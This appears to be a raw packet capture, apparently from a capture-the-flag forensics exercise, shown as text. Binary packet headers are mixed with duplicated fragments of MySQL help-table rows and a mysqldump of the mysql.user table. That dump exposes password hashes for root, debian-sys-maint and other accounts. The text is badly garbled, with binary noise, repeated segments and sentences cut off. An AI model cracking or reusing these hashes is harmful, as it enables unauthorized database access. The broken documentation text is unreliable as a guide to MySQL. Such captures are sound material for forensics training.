if X is not in the range -1 to\n1.\n','mysql> SELECT ACOS(1);\n -> 0.000000\nmysql> SELECT ACOS(1.0001);\n -> NULL\nmysql> SELECT ACOS(0);\n -> 1.570796',''),(351,'ISOLATION',10,'SET [GLOBAL | SESSION] TRANSACTION ISOLATION LEVEL\n{ READ UNCOMMITTED | READ COMMITTED | REPEATABLE READ | SERIALIZABLE }\n\nThis statement\nsets the transaction isolation level for the next transaction, globally, or\nfor the current session.\n\nThe default behavior of SET TRANSACTION is to set the isolation level\nfor the next (not yet\nstarted) transaction. If you use the GLOBAL keyword, the statement\nsets the default transaction level globally for all new connections\ncreated from that point on. Existing connections are unaffected.\nYou need the SUPER\nprivilege to do this. Using the SESSION keyword sets the\ndefault transaction level for all future transactions performed on the\ncurrent connection.\n\nFor descriptions of each Cbb0`BiET@/Ԁo0SE SELECT INET_NTOA(3520061480);\n -> \'209.207.224.40\'',''),(350,'ACOS',4,' ACOS(X)\nReturns the arc cosine of X, that is, the value whose cosine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ACOS(1);\n -> 0.000000\nmysql> SELECT ACOS(1.0001);\n -> NULL\nmysql> SELECT ACOS(0);\n -> 1.570796',''),(351,'ISOLATION',10,'SET [GLOBAL | SESSION] TRANSACTION ISOLATION LEVEL\n{ READ UNCOMMITTED | READ COMMITTED | REPEATABLE READ | SERIALIZABLE }\n\nThis statement\nsets the transaction isolation level for the next transaction, globally, or\nfor the current session.\n\nThe default behavior of SET TRANSACTION is to set the isolation level\nfor the next (not yet\nstarted) transaction. If you use the GLOBAL keyword, the statement\nsets the default transaction level globally for all new connections\ncreated from that point on. Existing connections are unaffected.\nYou need the SUPER\nprivilege to do this. Using the SESSION keyword sets the\ndefault transaction level for all future transactions performed on the\ncurrent connection.\n\nFor descriptions of each CAbbBi0`ET@/أ  o0E<@?  PgZ4a8  a-ult global isolation level for mysqld with\nthe --transaction-isolation option.\nSee also : [Server options].\n','',''),(352,'CEILING',4,' CEILING(X)\n CEIL(X)\nReturns the smallest integer value not less than X.\n','mysql> SELECT CEILING(1.23);\n -> 2\nmysql> SELECT CEIL(-1.23);\n -> -1',''),(353,'SIN',4,' SIN(X)\nReturns the sine of X, where X is given in radians.\n','mysql> SELECT SIN(PI());\n -> 0.000000',''),(354,'DAYOFWEEK',14,' DAYOFWEEK(date)\nReturns the weekday index\nfor date (1 = Sunday, 2 = Monday, ..., 7 =\nSaturday). These index values correspond to the ODBC standard.\n','mysql> SELECT DAYOFWEEK(\'1998-02-03\');\n -> 3',''),(355,'LINEFROMWKB',13,' LineFromWKB(wkb[,srid])\n LineStringFromWKB(wkb[,srid])\nConstructs a LINESTRING value using its WKB representation and SRID.\n','',''),(356,'GEOMETRYTYPE',19,' GeometryType(g)\nReturns as a string the name of the geometry type of which\nthe geometry instance g is a member.\nThe name corresponds to one of the instantiable Geometry subclasses.\n','mysql> SELECT GeometryType(GeomFromText(\'POINT(1 1)\'));\n+------------------------------------------+\n| GeometryType(GeomFromText(\'POINT(1 1)\')) |\n+------------------------------------------+\n| POINT C]bb0`BiET@/4o0 E<@@  PgZ4a8  a-ult global isolation level for mysqld with\nthe --transaction-isolation option.\nSee also : [Server options].\n','',''),(352,'CEILING',4,' CEILING(X)\n CEIL(X)\nReturns the smallest integer value not less than X.\n','mysql> SELECT CEILING(1.23);\n -> 2\nmysql> SELECT CEIL(-1.23);\n -> -1',''),(353,'SIN',4,' SIN(X)\nReturns the sine of X, where X is given in radians.\n','mysql> SELECT SIN(PI());\n -> 0.000000',''),(354,'DAYOFWEEK',14,' DAYOFWEEK(date)\nReturns the weekday index\nfor date (1 = Sunday, 2 = Monday, ..., 7 =\nSaturday). These index values correspond to the ODBC standard.\n','mysql> SELECT DAYOFWEEK(\'1998-02-03\');\n -> 3',''),(355,'LINEFROMWKB',13,' LineFromWKB(wkb[,srid])\n LineStringFromWKB(wkb[,srid])\nConstructs a LINESTRING value using its WKB representation and SRID.\n','',''),(356,'GEOMETRYTYPE',19,' GeometryType(g)\nReturns as a string the name of the geometry type of which\nthe geometry instance g is a member.\nThe name corresponds to one of the instantiable Geometry subclasses.\n','mysql> SELECT GeometryType(GeomFromText(\'POINT(1 1)\'));\n+------------------------------------------+\n| GeometryType(GeomFromText(\'POINT(1 1)\')) |\n+------------------------------------------+\n| POINT C5bbBi0`ET@/p܂Ao0E SELECT CEILING(1.23);\n -> 2\nmysql> SELECT CEIL(-1.23);\n -> -1',''),(353,'SIN',4,' SIN(X)\nReturns the sine of X, where X is given in radians.\n','mysql> SELECT SIN(PI());\n -> 0.000000',''),(354,'DAYOFWEEK',14,' DAYOFWEEK(date)\nReturns the weekday index\nfor date (1 = Sunday, 2 = Monday, ..., 7 =\nSaturday). These index values correspond to the ODBC standard.\n','mysql> SELECT DAYOFWEEK(\'1998-02-03\');\n -> 3',''),(355,'LINEFROMWKB',13,' LineFromWKB(wkb[,srid])\n LineStringFromWKB(wkb[,srid])\nConstructs a LINESTRING value using its WKB representation and SRID.\n','',''),(356,'GEOMETRYTYPE',19,' GeometryType(g)\nReturns as a string the name of the geometry type of which\nthe geometry instance g is a member.\nThe name corresponds to one of the instantiable Geometry subclasseC>ZZBi0`EL@/܂Sŀo0E4\m@? 3 Pu}Ul$ )CVbb0`BiET@/Ԁo0SE SELECT CEILING(1.23);\n -> 2\nmysql> SELECT CEIL(-1.23);\n -> -1',''),(353,'SIN',4,' SIN(X)\nReturns the sine of X, where X is given in radians.\n','mysql> SELECT SIN(PI());\n -> 0.000000',''),(354,'DAYOFWEEK',14,' DAYOFWEEK(date)\nReturns the weekday index\nfor date (1 = Sunday, 2 = Monday, ..., 7 =\nSaturday). These index values correspond to the ODBC standard.\n','mysql> SELECT DAYOFWEEK(\'1998-02-03\');\n -> 3',''),(355,'LINEFROMWKB',13,' LineFromWKB(wkb[,srid])\n LineStringFromWKB(wkb[,srid])\nConstructs a LINESTRING value using its WKB representation and SRID.\n','',''),(356,'GEOMETRYTYPE',19,' GeometryType(g)\nReturns as a string the name of the geometry type of which\nthe geometry instance g is a member.\nThe name corresponds to one of the instantiable Geometry subclasseCgZZ0`BiEL@/go0AE4\m@@ 3 Pu}Ul$ )CbbBi0`ET@/p܂Ao0E SELECT GeometryType(GeomFromText(\'POINT(1 1)\'));\n+------------------------------------------+\n| GeometryType(GeomFromText(\'POINT(1 1)\')) |\n+------------------------------------------+\n| POINT |\n+------------------------------------------+',''),(357,'GRANT TYPES',7,'For the GRANT and REVOKE statements, priv_type can be\nspecified as any of the following:\n\n Privilege Meaning\n ALL [PRIVILEGES] Sets all simple privileges except GRANT OPTION\n ALTER Allows use of ALTER TABLE\n ALTER ROUTINE Alter or drop stored routines\n CREATE Allows use of CREATE TABLE\n CREATE ROUTINE Create stored routines\n CREATE TEMPORARY TABLES Allows use of CREATE TEMPORARY TABLE\n CREATE USER Allows use of CREATE USER, DROP USER, RENAME USER, and REVOKE ALL PRIVILEGES.\n CREATE VIEW Allows use of CREATE VIEW\n DELETE Allows use of DELETE\n DROP Allows use of DROP TABLE\n EXECUTE Allows the user to run stored routines\n FILE Allows use of SELECT ... INTO OUTFILE and LOAD DATA INFILE\n INDEX Allows use of CREATE INDEX and DROP INDEX\n INSERT Allows use of INSERT\n LOCK TABLES Allows use of LOCK TABLES on tables for which you have the SELECT privilege\n PROCESS AllowsCbb0`BiET@/Ԁo0SE SELECT GeometryType(GeomFromText(\'POINT(1 1)\'));\n+------------------------------------------+\n| GeometryType(GeomFromText(\'POINT(1 1)\')) |\n+------------------------------------------+\n| POINT |\n+------------------------------------------+',''),(357,'GRANT TYPES',7,'For the GRANT and REVOKE statements, priv_type can be\nspecified as any of the following:\n\n Privilege Meaning\n ALL [PRIVILEGES] Sets all simple privileges except GRANT OPTION\n ALTER Allows use of ALTER TABLE\n ALTER ROUTINE Alter or drop stored routines\n CREATE Allows use of CREATE TABLE\n CREATE ROUTINE Create stored routines\n CREATE TEMPORARY TABLES Allows use of CREATE TEMPORARY TABLE\n CREATE USER Allows use of CREATE USER, DROP USER, RENAME USER, and REVOKE ALL PRIVILEGES.\n CREATE VIEW Allows use of CREATE VIEW\n DELETE Allows use of DELETE\n DROP Allows use of DROP TABLE\n EXECUTE Allows the user to run stored routines\n FILE Allows use of SELECT ... INTO OUTFILE and LOAD DATA INFILE\n INDEX Allows use of CREATE INDEX and DROP INDEX\n INSERT Allows use of INSERT\n LOCK TABLES Allows use of LOCK TABLES on tables for which you have the SELECT privilege\n PROCESS AllowsCbbBi0`ET@/p܂Ao0E CREATE VIEW test.v AS SELECT * FROM t;\n\nTables and views share the same namespace within a database, so a database\ncannot contain a table and a view that have the same name.\n\nViews must have unique column names with no duplicates, just like base\ntables. By default, the names of the columns retrieved by the SELECT\nstatement are used for the view column names. To define explicit names for\nthe view columns, the optional column_list clause can be given as a\nlist of comma-separated identifiers. The number of names in\ncolumn_list must be the same as the number of columns retrieved by the\nSELECT statement.\n\nColumns retrieved by the SELECT statement can be simple references to\ntable columns. They can also be expressions that use functions, constant\nvalues, operators, and so forth.\n\nUnqualified table or view names in the SELECT statement are\ninterpreted with respect to the default database. A view can refer to\ntables or views in other databases by qualifCbb0`BiET@/Ԁo0SE CREATE VIEW test.v AS SELECT * FROM t;\n\nTables and views share the same namespace within a database, so a database\ncannot contain a table and a view that have the same name.\n\nViews must have unique column names with no duplicates, just like base\ntables. By default, the names of the columns retrieved by the SELECT\nstatement are used for the view column names. To define explicit names for\nthe view columns, the optional column_list clause can be given as a\nlist of comma-separated identifiers. The number of names in\ncolumn_list must be the same as the number of columns retrieved by the\nSELECT statement.\n\nColumns retrieved by the SELECT statement can be simple references to\ntable columns. They can also be expressions that use functions, constant\nvalues, operators, and so forth.\n\nUnqualified table or view names in the SELECT statement are\ninterpreted with respect to the default database. A view can refer to\ntables or views in other databases by qualifCbbBi0`ET@/p܂Ao0E CREATE TABLE t (qty INT, price INT);\nmysql> INSERT INTO t VALUES(3, 50);\nmysql> CREATE VIEW v AS SELECT qty, price, qty*price AS value FROM t;\nmysql> SELECT * FROM v;\n+------+-------+-------+\n| qty | price | value |\n+------+-------+-------+\n| 3 | 50 | 150 |\n+------+-------+-------+\n\nA view definition is subject to the following restrictions:\n\n\n --- The SELECT statement cannot contain a subquery in the FROM\nclause.\n\n --- The SELECT statement cannot refer to system or user variables.\n\n --- The SELECT statement cannot refer to prepared statement parameters.\n\n --- Within a stored routine, the definition cannot refer to routine\nparameters or local variables.\n\n --- Any table or view referred to in the definition must exist. However, after\na view has been created, it is possible to drop a table or view that the\ndefinition refers to. To chCbb0`BiET@/Ԁo0SE CREATE TABLE t (qty INT, price INT);\nmysql> INSERT INTO t VALUES(3, 50);\nmysql> CREATE VIEW v AS SELECT qty, price, qty*price AS value FROM t;\nmysql> SELECT * FROM v;\n+------+-------+-------+\n| qty | price | value |\n+------+-------+-------+\n| 3 | 50 | 150 |\n+------+-------+-------+\n\nA view definition is subject to the following restrictions:\n\n\n --- The SELECT statement cannot contain a subquery in the FROM\nclause.\n\n --- The SELECT statement cannot refer to system or user variables.\n\n --- The SELECT statement cannot refer to prepared statement parameters.\n\n --- Within a stored routine, the definition cannot refer to routine\nparameters or local variables.\n\n --- Any table or view referred to in the definition must exist. However, after\na view has been created, it is possible to drop a table or view that the\ndefinition refers to. To chCbbBi0`ET@/p܂Ao0E CREATE VIEW v AS SELECT CHARSET(CHAR(65)), COLLATION(CHAR(65));\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SET NAMES \'latin1\';\nQuery OK, 0 C ZZBi0`EL@/Ao0E4*@?H  PPZ"l7 e`QC$bb0`BiET@/Ԁo0SE CREATE VIEW v AS SELECT CHARSET(CHAR(65)), COLLATION(CHAR(65));\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SET NAMES \'latin1\';\nQuery OK, 0 C6ZZ0`BiEL@/o0  E4*@@G  PPZ"l7 e`QC;bbBi0`ET@/p܂Ao0E SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| latin1 | latin1_swedish_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nmysql> SET NAMES \'utf8\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| utf8 | utf8_general_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nThe optional ALGORITHM clause is a MySQL extension to standard SQL.\nALGORITHM takes three values: MERGE, TEMPTABLE, or\nUNDEFINED. The default algorithm is UNDEFINED if no\nALGORITHM clause is present. The algorithm affects how MySQL\nprocesses the view.\n\nFor MERGE, the text of a statement that refers to the view and the view\ndefinition are merged such that parts of the view definition replace\ncorresponding parts of the statement.\n\nFor TEMPTABLE, the results from the view are retrieved into a\ntemporary table, which then is used to execute the statement.\n\nFor UNDEFINED, MySQL chooses which algorithm to use. It prefers\nCBZZBi0`EL@/܂Sŀo0E4b@?/ 3 P7b ) CYbb0`BiET@/Ԁo0SE SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| latin1 | latin1_swedish_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nmysql> SET NAMES \'utf8\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| utf8 | utf8_general_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nThe optional ALGORITHM clause is a MySQL extension to standard SQL.\nALGORITHM takes three values: MERGE, TEMPTABLE, or\nUNDEFINED. The default algorithm is UNDEFINED if no\nALGORITHM clause is present. The algorithm affects how MySQL\nprocesses the view.\n\nFor MERGE, the text of a statement that refers to the view and the view\ndefinition are merged such that parts of the view definition replace\ncorresponding parts of the statement.\n\nFor TEMPTABLE, the results from the view are retrieved into a\ntemporary table, which then is used to execute the statement.\n\nFor UNDEFINED, MySQL chooses which algorithm to use. It prefers\nCkZZ0`BiEL@/go0AE4b@@. 3 P7b ) C_ bbBi0`ET@/p܂Ao0E 100;\n\nExample 1: Suppose that we issue this C{ bb0`BiET@/Ԁo0SE 100;\n\nExample 1: Suppose that we issue this CbbBi0`ET@/p܂Ao0E 100;\n\nExample 2: Suppose that we issue this statement:\n\nSELECT * FROM v_merge WHERE vc1 < 100;\n\nThis statement is handled similarly to the previous one, except that\nvc1 < 100 becomes c1 < 100 and the view WHERE clause is\nadded to the statement WHERE clause using an AND connective\n(and parentheses are added to make sure the parts of the clause are executed\nwith correct precedence). The resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE (c3 > 100) AND (c1 < 100);\n\nEffectively, the statement to be executed has a WHERE clause of this\nform:\n\nWHERE (select WHERE) AND (view WHERE)\n\nThe MERGE algorithm requires a one-to relationship between the rows\nin the view and the rows in the underlying table. If this relationship does\nnot hold, a temporary table must be used instead. Lack of a one-to-one\nrelationship occurs if the view contains any of a number of constructs:\n\n\n --- Aggregate functions (SUM(), MIN(), MAX(),\nCOUNT(), and so forth)\n\n ---CZZBi0`EL@/uAo0E4@?  3P1 ?   )Cbb0`BiET@/Ԁo0SE 100;\n\nExample 2: Suppose that we issue this statement:\n\nSELECT * FROM v_merge WHERE vc1 < 100;\n\nThis statement is handled similarly to the previous one, except that\nvc1 < 100 becomes c1 < 100 and the view WHERE clause is\nadded to the statement WHERE clause using an AND connective\n(and parentheses are added to make sure the parts of the clause are executed\nwith correct precedence). The resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE (c3 > 100) AND (c1 < 100);\n\nEffectively, the statement to be executed has a WHERE clause of this\nform:\n\nWHERE (select WHERE) AND (view WHERE)\n\nThe MERGE algorithm requires a one-to relationship between the rows\nin the view and the rows in the underlying table. If this relationship does\nnot hold, a temporary table must be used instead. Lack of a one-to-one\nrelationship occurs if the view contains any of a number of constructs:\n\n\n --- Aggregate functions (SUM(), MIN(), MAX(),\nCOUNT(), and so forth)\n\n ---CZZ0`BiEL@/܀o0SE4@@  3P1 ?   )CbbBi0`ET@/p܂Ao0E SELECT TRIM(\' bar \');\n -> \'bar\'\nmysql> SELECT TRIM(LEADING \'x\' FROM \'xxxbarxxx\');\n -> \'barxxx\'\nmysql> SELECT TRIM(BOTH \'x\' FROM \'xxxbarxxx\');\n -> \'bar\'\nmysql> SELECT TRIM(TRAILING \'xyz\' FROM \'barxxyz\');\n -> \'barx\'',''),(360,'IS',26,' IS boolean_value\n IS NOT boolean_value\nTests whether a value against a boolean value, where boolean_value can\nbe TRUE, FALSE, orCZZBi0`EL@/܂Sŀo0E4\q@? 3 Pu}Uό$s ) Cbb0`BiET@/Ԁo0SE SELECT TRIM(\' bar \');\n -> \'bar\'\nmysql> SELECT TRIM(LEADING \'x\' FROM \'xxxbarxxx\');\n -> \'barxxx\'\nmysql> SELECT TRIM(BOTH \'x\' FROM \'xxxbarxxx\');\n -> \'bar\'\nmysql> SELECT TRIM(TRAILING \'xyz\' FROM \'barxxyz\');\n -> \'barx\'',''),(360,'IS',26,' IS boolean_value\n IS NOT boolean_value\nTests whether a value against a boolean value, where boolean_value can\nbe TRUE, FALSE, orCZZ0`BiEL@/go0AE4\q@@ 3 Pu}Uό$s ) CH#bbBi0`ET@/p܂Ao0E SELECT 1 IS TRUE, 0 IS FALSE, NULL IS UNKNOWN;\n -> 1, 1, 1\nmysql> SELECT 1 IS NOT UNKNOWN, 0 IS NOT UNKNOWN, NULL IS NOT UNKNOWN;\n -> 1, 1, 0',''),(361,'GET_FORMAT',14,' GET_FORMAT(DATE|TIME|DATETIME, \'EUR\'|\'USA\'|\'JIS\'|\'ISO\'|\'INTERNAL\')\nReturns a format string. This function is useful in combination with the\nDATE_FORMAT() and the STR_TO_DATE() functions.\nThe three possible values for the first argument\nand the five possible values for the second argument result in 15 possible\nformat strings (for the specifiers used, see the table in the\nDATE_FORMAT() function description).\n Function Call Result\n GET_FORMAT(DATE,\'USA\') \'%m.%d.%Y\'\n GET_FORMAT(DATE,\'JIS\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'ISO\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'EUR\') \'%d.%m.%Y\'\n GET_FORMAT(DATE,\'INTERNAL\') \'%Y%m%d\'\n GET_FORMAT(DATETIME,\'USA\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'JIS\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'ISO\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'EUR\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'INTERNAL\') \'%Y%m%d%H%i%s\'\n GET_FORMAT(TIME,\'USA\') \'%h:%i:%s %p\'\n GET_FORMAT(TIME,\'JIS\') \'%H:%i:%s\'\n GET_FORMAT(TIME,\'ISCc#bb0`BiET@/Ԁo0SE SELECT 1 IS TRUE, 0 IS FALSE, NULL IS UNKNOWN;\n -> 1, 1, 1\nmysql> SELECT 1 IS NOT UNKNOWN, 0 IS NOT UNKNOWN, NULL IS NOT UNKNOWN;\n -> 1, 1, 0',''),(361,'GET_FORMAT',14,' GET_FORMAT(DATE|TIME|DATETIME, \'EUR\'|\'USA\'|\'JIS\'|\'ISO\'|\'INTERNAL\')\nReturns a format string. This function is useful in combination with the\nDATE_FORMAT() and the STR_TO_DATE() functions.\nThe three possible values for the first argument\nand the five possible values for the second argument result in 15 possible\nformat strings (for the specifiers used, see the table in the\nDATE_FORMAT() function description).\n Function Call Result\n GET_FORMAT(DATE,\'USA\') \'%m.%d.%Y\'\n GET_FORMAT(DATE,\'JIS\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'ISO\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'EUR\') \'%d.%m.%Y\'\n GET_FORMAT(DATE,\'INTERNAL\') \'%Y%m%d\'\n GET_FORMAT(DATETIME,\'USA\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'JIS\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'ISO\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'EUR\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'INTERNAL\') \'%Y%m%d%H%i%s\'\n GET_FORMAT(TIME,\'USA\') \'%h:%i:%s %p\'\n GET_FORMAT(TIME,\'JIS\') \'%H:%i:%s\'\n GET_FORMAT(TIME,\'ISC$ZZBi0`EL@/Ao0E4 @?  ֞Pg%"l emWC$ZZ0`BiEL@/o0˃2E4 @@  ֞Pg%"l emWC'bbBi0`ET@/p܂Ao0E<_@?L  3PXtڀ   )um('N','Y') NOT NULL default 'N', `File_priv` enum('N','Y') NOT NULL default 'N', `Grant_priv` enum('N','Y') NOT NULL default 'N', `References_priv` enum('N','Y') NOT NULL default 'N', `Index_priv` enum('N','Y') NOT NULL default 'N', `Alter_priv` enum('N','Y') NOT NULL default 'N', `Show_db_priv` enum('N','Y') NOT NULL default 'N', `Super_priv` enum('N','Y') NOT NULL default 'N', `Create_tmp_table_priv` enum('N','Y') NOT NULL default 'N', `Lock_tables_priv` enum('N','Y') NOT NULL default 'N', `Execute_priv` enum('N','Y') NOT NULL default 'N', `Repl_slave_priv` enum('N','Y') NOT NULL default 'N', `Repl_client_priv` enum('N','Y') NOT NULL default 'N', `ssl_type` enum('','ANY','X509','SPECIFIED') NOT NULL default '', `ssl_cipher` blob NOT NULL, `x509_issuer` blob NOT NULL, `x509_subject` blob NOT NULL, `max_questions` int(11) unsigned NOT NULL default '0', `max_updates` int(11) unsigned NOT NULL default '0', `max_connections` int(11) unsigned NOT NULL default '0', PRIMARY KEY (`Host`,`User`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Users and global privileges'; -- -- Dumping data for table `user` -- /*!40000 ALTER TABLE `user` DISABLE KEYS */; LOCK TABLES `user` WRITE; INSERT INTO `user` VALUES ('localhost','root','0b5ccC'ZZBi0`EL@/܂Sŀo0E4@? 3 Pc'tF ) C'bb0`BiET@/Ԁo0SE<_@@K  3PXtڀ   )um('N','Y') NOT NULL default 'N', `File_priv` enum('N','Y') NOT NULL default 'N', `Grant_priv` enum('N','Y') NOT NULL default 'N', `References_priv` enum('N','Y') NOT NULL default 'N', `Index_priv` enum('N','Y') NOT NULL default 'N', `Alter_priv` enum('N','Y') NOT NULL default 'N', `Show_db_priv` enum('N','Y') NOT NULL default 'N', `Super_priv` enum('N','Y') NOT NULL default 'N', `Create_tmp_table_priv` enum('N','Y') NOT NULL default 'N', `Lock_tables_priv` enum('N','Y') NOT NULL default 'N', `Execute_priv` enum('N','Y') NOT NULL default 'N', `Repl_slave_priv` enum('N','Y') NOT NULL default 'N', `Repl_client_priv` enum('N','Y') NOT NULL default 'N', `ssl_type` enum('','ANY','X509','SPECIFIED') NOT NULL default '', `ssl_cipher` blob NOT NULL, `x509_issuer` blob NOT NULL, `x509_subject` blob NOT NULL, `max_questions` int(11) unsigned NOT NULL default '0', `max_updates` int(11) unsigned NOT NULL default '0', `max_connections` int(11) unsigned NOT NULL default '0', PRIMARY KEY (`Host`,`User`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Users and global privileges'; -- -- Dumping data for table `user` -- /*!40000 ALTER TABLE `user` DISABLE KEYS */; LOCK TABLES `user` WRITE; INSERT INTO `user` VALUES ('localhost','root','0b5ccC'ZZ0`BiEL@/go0AE4@@ 3 Pc'tF ) C)ZZBi0`EL@/܂Sŀo0E4@? 3 Pk) ) C)ZZ0`BiEL@/go0AE4@@ 3 Pk) ) C,bbBi0`ET@/p܂Ao0E<`@?L  3PXɟtڀ P   )5fb0adff467','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0),('ctf','root','0b5cc5fb0adff467','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0),('localhost','','','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0),('ctf','','','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0),('localhost','debian-sys-maint','4cb661a2128ef44c','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0),('localhost.localdomain','root','0b5cc5fb0adff467','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0),('localhost','contribute','16d7f906289d77b3','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0),('localhost.localdomain','shof','22e1f6643dbc67a3','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0),('localhost','shof','22e1f6643dbc67a3','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0),('%','shof','22e1f6643dbc67a3','N','N','N','N'C,ZZBi0`EL@/Ao0E4@?|F  &P>ʈ:Ji ey-C,bb0`BiET@/Ԁo0SE<`@@K  3PXɟtڀ P   )5fb0adff467','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0),('ctf','root','0b5cc5fb0adff467','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0),('localhost','','','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0),('ctf','','','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0),('localhost','debian-sys-maint','4cb661a2128ef44c','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0),('localhost.localdomain','root','0b5cc5fb0adff467','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0),('localhost','contribute','16d7f906289d77b3','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0),('localhost.localdomain','shof','22e1f6643dbc67a3','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0),('localhost','shof','22e1f6643dbc67a3','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0),('%','shof','22e1f6643dbc67a3','N','N','N','N'C,ZZ0`BiEL@/Eo0lE4@@{F  &P>ʈ:Ji ey-C-Bi0`Ev@/rAo0E^a@?M  3PXџtڀ /[  ),'N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0); UNLOCK TABLES; /*!40000 ALTER TABLE `user` ENABLE KEYS */; -- -- Current Database: `test` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `test` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `test`; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; C-0`BiEv@/o0SE^a@@L  3PXџtڀ /[  ),'N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0); UNLOCK TABLES; /*!40000 ALTER TABLE `user` ENABLE KEYS */; -- -- Current Database: `test` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `test` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `test`; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; C/ZZBi0`EL@/Ao0E4@?  ֞Pg%"ly emZC0ZZ0`BiEL@/o0˃2E4@@  ֞Pg%"ly emZCi2bbBi0`ET@/أ  o0E< @?y  3PZ{ # a)hNULL default '', `User` char(16) character set latin1 collate latin1_bin NOT NULL default '', `Select_priv` enum('N','Y') NOT NULL default 'N', `Insert_priv` enum('N','Y') NOT NULL default 'N', `Update_priv` enum('N','Y') NOT NULL default 'N', `Delete_priv` enum('N','Y') NOT NULL default 'N', `Create_priv` enum('N','Y') NOT NULL default 'N', `Drop_priv` enum('N','Y') NOT NULL default 'N', `Grant_priv` enum('N','Y') NOT NULL default 'N', `References_priv` enum('N','Y') NOT NULL default 'N', `Index_priv` enum('N','Y') NOT NULL default 'N', 